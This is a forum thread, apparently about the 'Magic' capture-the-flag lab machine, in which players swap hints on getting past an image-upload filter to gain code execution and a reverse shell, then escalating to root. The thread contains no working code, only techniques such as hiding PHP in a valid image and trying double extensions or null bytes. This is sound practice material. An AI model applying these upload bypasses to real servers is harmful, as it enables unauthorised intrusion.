Magic

Had some trouble with root but in the end made it. Shout out to all the people who helped me, thanks a ton guys :slight_smile: , Open for hints :slight_smile:

stuck with the upload form, tried different approaches (using just magic, concatenating two files) but canā€™t get RCE, let alone a reverse shell! a nudge would be appreciated :frowning:

@federella said:

stuck with the upload form, tried different approaches (using just magic, concatenating two files) but canā€™t get RCE, let alone a reverse shell! a nudge would be appreciated :frowning:

You can get a good example of how to bypass this by googling what you are trying to do and going to a gitbook page.

Ideally you want to be uploading an actual valid image.

This was a very fun machine, there are a lot of good hints here. I have a couple more below:

Foothold: OWASP Top 10 and hide something in plain sight

User: If at first you donā€™t succeed try again with something you already know

Root: You can sometimes trick a system into looking at something it shouldnā€™t

PM me if you need any hints

Type your comment

Hi all.

Get the user quite easy. there are at least two solutions to get in :slight_smile:
lovely box.

But need some hint about root.

As i see gdb is present. is we need to look in this direction?

also, we have one +s file, witch allowed to our grp.

it this ok?

Could not attach to process. If your uid matches the uid of the target
process, check the setting of /proc/sys/kernel/yama/ptrace_scope, or try
again as the root user. For more details, see /etc/sysctl.d/10-ptrace.conf
ptrace: Operation not permitted.

in my local solytion alredy found, but, as always, not in the server)

Done. Was really struggling with the root part for some hours because I misunderstood how that whole thing worked.

Very nice box!

@swagcat228 said:

Could not attach to process. If your uid matches the uid of the target
process, check the setting of /proc/sys/kernel/yama/ptrace_scope, or try
again as the root user. For more details, see /etc/sysctl.d/10-ptrace.conf
ptrace: Operation not permitted.

in my local solytion alredy found, but, as always, not in the server)

You might be overthinking this. You donā€™t need to RE anything for this box. Have a look at what its doing and see if you can meddle with it.

#Maybe an issue?
Hi, iā€™m stuck with the upload of imageā€¦ i tried all way to upload my rev, but if i upload a clean image too, catch ever and ever the ā€œalertā€ of png, jpg extension.

Anyone same issue??

Hi All. Working on root. When trying to upgrade the shell, it seems I am now getting an error that wonā€™t allow /bin/sh commands. Anyone having that problem or know how I might be able to get around? This was not an issue for the last few days.

Root Dance - learned an interesting method regarding the uploading.

Hello,

Could I have an hint on the initial foothold ?
I can upload a file that contains PHP code, but I havenā€™t found a way to make it end with a executable extension. (Null bytes, double extension, content-type didnā€™t work).

I havenā€™t found any PHP file that does inclusion and would allow an RCE by including the image with php code.

I have also tried to include php instructions directly into the page since quotes arenā€™t filtered in the filename but it didnā€™t work either.

I am a bit lost about the direction I should take.

Obviously, I find what I am looking just after asking for help ?.
Search for OWASP documentation about file upload. There are some strange configuration about what get to be executed on a server.

stuck on www-root :confused:

And root! Great box from start to finish.

Happy to answer messages for hints.

I totally agree, I also enjoyed the box and had fun. Thanks.

Sanity check, someone please? I may be into a rabbit hole trying to rootā€¦ DM if possible

ROOTED.

Learned alot on this one! Thanks @TRX

Incredibly satisfying box for me. Although the frustration at getting initial foothold was maddening, the moment you realize how to get it, will give satisfaction in awesome waves ;). Root was very routine I think. The user part was really great. Thank you for this box.